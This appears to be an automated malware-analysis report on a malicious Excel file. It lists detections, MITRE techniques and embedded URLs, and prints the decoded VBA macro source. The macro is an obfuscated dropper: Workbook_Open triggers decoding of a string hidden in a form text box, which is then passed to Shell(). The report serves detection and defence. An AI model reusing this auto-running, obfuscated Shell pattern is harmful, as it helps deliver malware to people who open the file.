MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The presence of the Shell() call and the Workbook_Open event strongly suggests the macro is designed to download and execute a secondary payload, a common technique for malware delivery. The ClamAV detection further supports its malicious nature.
Heuristics 5
-
ClamAV: Xls.Malware.Generic-6735647-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Generic-6735647-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.day.com/dam/1.0 In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10225 bytes |
SHA-256: e90e3fb26b9bbadd6f895438d2ce4002d14e1c49a159bce4bbe630fe169c9bf0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
A1 = "890"
a2 = "160000"
chageDoc a2
a = "exit " + a2
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub reports(arg1, ByRef later)
jtask = 1
later = 0
ostr jtask, later, arg1
End Sub
'create module
Sub new_func(ARG2, ByRef minA)
minA = ""
If ARG2 = -1 Then
ARG2 = -1
End If
If ARG2 < 1 Then
task_format_accounting TaskForm1.further, Len(TaskForm1.further) + ARG2, minA
Else
task_format_accounting TaskForm1.further, ARG2, minA
End If
End Sub
Sub task_formulas()
line2 = ""
task_set_validations TaskForm1.wryh, line2
With TaskForm1
.cppc = line2
.TextBox1 = .cppc
End With
End Sub
Sub task_set_validations(SIGUSR2, ByRef should)
should = ""
str2 = 1
task_scrub_cpc str2, should, SIGUSR2
End Sub
Sub task_scrub_cpc(ByRef B1, ByRef ARG2, arg1)
lev = Len(arg1)
If B1 <= lev Then
b2 = ""
task_format_accounting arg1, B1, b2
down2 = 1
reports b2, down2
a = ""
new_func down2 - 2, a
ARG2 = ARG2 + a
B1 = B1 + 1
task_scrub_cpc B1, ARG2, arg1
End If
End Sub
Sub task_format_accounting(check, pointB, ByRef B1)
B1 = Right(Left(check, pointB), 1)
End Sub
Sub chageDoc(have)
TaskForm1.NextData = have
End Sub
Sub ostr(ByRef arg1, ByRef maxA, bolton)
st1 = 1
st1 = Len(TaskForm1.further)
If arg1 < st1 Then
line = ""
task_format_accounting TaskForm1.further, arg1, line
If bolton <> line Then
arg1 = arg1 + 1
ostr arg1, maxA, bolton
Else
maxA = arg1
End If
End If
End Sub
Attribute VB_Name = "TaskForm1"
Attribute VB_Base = "0{243A6F15-33C2-4796-982C-90412157E5FD}{424F2909-5413-4BC5-B550-06C95E1CA291}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub NextData_Change()
task_formulas
End Sub
Private Sub TextBox1_Change()
A1 = 30 * 100
char2 = "1021"
char2 = "22"
char2 = "70"
imin = "54"
imin = "35"
imin = "57"
char2 = "75"
'ers s to str1 hfile
char2 = "52"
char2 = "19"
char2 = "92"
low1 = A1 - 10 * 300
char2 = "41"
char2 = "86"
char2 = TaskForm1.TextBox1
imin = "7"
imin = "36"
If low1 = 0 Then Shell char2, low1
imin = "62"
imin = "10"
imin = "80"
imin = "3"
imin = "28"
imin = "56"
imin = "29"
imin = "33"
char2 = "70"
char2 = "68"
char2 = "60"
char2 = "64"
char2 = "73"
char2 = "51"
char2 = "9"
char2 = "21"
End Sub
Private Sub wryh_Change()
End Sub
' Processing file: /opt/analyzer/scan_staging/e1f562278f884443a57c7b5e561a3290.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 1297 bytes
' Line #0:
' FuncDefn (Sub Workbook_Open())
' Line #1:
' LitStr 0x0003 "890"
' St A1
' Li
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.